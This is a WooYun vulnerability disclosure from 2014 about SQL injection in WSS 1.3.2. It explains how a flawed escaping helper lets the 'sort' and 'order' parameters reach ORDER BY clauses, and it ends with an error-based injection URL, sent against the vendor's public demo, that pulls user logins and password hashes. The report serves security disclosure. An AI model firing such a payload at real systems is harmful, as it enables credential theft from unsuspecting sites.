WSS最新版多处SQL注入直接获取数据三（官方demo演示及快速定位漏洞技巧）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084151

漏洞标题：WSS最新版多处SQL注入直接获取数据三（官方demo演示及快速定位漏洞技巧）

漏洞作者： xfkxfk

提交时间：2014-11-21 17:58

修复时间：2014-12-30 14:44

公开时间：2014-12-30 14:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-21：细节已通知厂商并且等待厂商处理中
2014-11-26：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2015-01-20：细节向核心白帽子及相关领域专家公开
2015-01-30：细节向普通白帽子公开
2015-02-09：细节向实习白帽子公开
2014-12-30：细节向公众公开

简要描述：

WSS最新版多处SQL注入直接获取数据三，官方demo演示，这里存在多处，对同一问题进行总结

详细说明：

WSS最新版1.3.2，这里存在多处，并对此同一问题进行总结，以及快速查找同一问题全部漏洞

这里的漏洞没有任何权限限制，任何用户都能进行注入

漏洞分析：
WooYun: WSS最新版某处SQL注入直接获取数据二（两处）
WSS最新版某处SQL注入直接获取数据二（两处）
这个漏洞之前已经降到了漏洞的过程
因为全局过滤函数设计缺陷导致sql注入

if (!function_exists("GetSQLValueString")) {
function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") 
{
  if (PHP_VERSION < 6) {
    $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue;
  }
  $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue);
  switch ($theType) {
    case "text":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;    
    case "long":
    case "int":
      $theValue = ($theValue != "") ? intval($theValue) : "NULL";
      break;
    case "double":
      $theValue = ($theValue != "") ? doubleval($theValue) : "NULL";
      break;
    case "date":
      $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL";
      break;
    case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;
      break;
  }
  return $theValue;
}
}

看这里

case "defined":
      $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue;

如果进到这里的话，就等于没有进行任何处理，然后返回了相应数据
恰恰在程序里面很大地方都使用了这里的defined值，导致过滤无效
漏洞定位：
我们全局搜索：

"defined",

得到6处存在漏洞的地方：

default_user.php上一个漏洞已经详细分析过了
这里我们看看control_project.php和control_task.php
以control_task.php为例：

......
$sortlist = "csa_last_update";
if (isset($_GET['sort'])) {
  $sortlist = $_GET['sort'];
}
$orderlist = "DESC";
if (isset($_GET['order'])) {
  $orderlist= $_GET['order'];
}
......
$query_Recordset1 = sprintf("SELECT *, 
							
							tk_project.project_name as project_name_prt,
							tk_user1.tk_display_name as tk_display_name1, 
							tk_user2.tk_display_name as tk_display_name2
							
							FROM tk_task  
							inner join tk_task_tpye on tk_task.csa_type=tk_task_tpye.id
							inner join tk_project on tk_task.csa_project=tk_project.id
							
							inner join tk_user as tk_user1 on tk_task.csa_to_user=tk_user1.uid 
							inner join tk_user as tk_user2 on tk_task.csa_from_user=tk_user2.uid 
							
							inner join tk_status on tk_task.csa_remark2=tk_status.id
							
							$where 
							(tk_task.csa_plan_st <=%s
 							AND tk_task.csa_plan_et >=%s
							OR tk_task.csa_plan_st <=%s
 							AND tk_task.csa_plan_et >=%s
							OR tk_task.csa_plan_st >=%s
 							AND tk_task.csa_plan_et <=%s)
														
							ORDER BY %s %s", 
							
							GetSQLValueString($startday , "text"),
							GetSQLValueString($startday , "text"),
							GetSQLValueString($endday , "text"),
							GetSQLValueString($endday , "text"),
							GetSQLValueString($startday , "text"),
							GetSQLValueString($endday , "text"),
							GetSQLValueString($sortlist, "defined", $sortlist, "NULL"),
							GetSQLValueString($orderlist, "defined", $orderlist, "NULL")
							);
$query_limit_Recordset1 = sprintf("%s LIMIT %d, %d", $query_Recordset1, $startRow_Recordset1, $maxRows_Recordset1);
$Recordset1 = mysql_query($query_limit_Recordset1, $tankdb) or die(mysql_error());
$row_Recordset1 = mysql_fetch_assoc($Recordset1);

漏洞原理跟上一个漏洞一致
都是sort和order参数进入GetSQLValueString函数后，使用了defined类型，导致过滤失效
这里直接访问control_project.php和control_task.php是不行的，会报错
且这里存在绝对路径泄露：

那么肯定是在其他地方调用了
我们继续全局搜索：

control_project

在/project.php调用：

<div class="pagemargin">
<?php require('control_project.php'); ?>
</div>

继续搜索

control_task

在/index.php调用：

<div class="pagemargin">
<?php require('control_task.php'); ?>
</div>

因为在index.php和project.php页面，且control_project.php和control_task.php没有权限限制，全部用户都有权限访问
下面我们在官方demo测试

漏洞证明：

官方demo是最新正式版1.3.2

http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27

http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-12-30 14:44

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084151

漏洞标题：WSS最新版多处SQL注入直接获取数据三（官方demo演示及快速定位漏洞技巧）

相关厂商：WSS Lab

漏洞作者： xfkxfk

提交时间：2014-11-21 17:58

修复时间：2014-12-30 14:44

公开时间：2014-12-30 14:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-084151

漏洞标题：WSS最新版多处SQL注入直接获取数据三（官方demo演示及快速定位漏洞技巧）

相关厂商：WSS Lab

漏洞作者： xfkxfk

提交时间：2014-11-21 17:58

修复时间：2014-12-30 14:44

公开时间：2014-12-30 14:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-084151"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：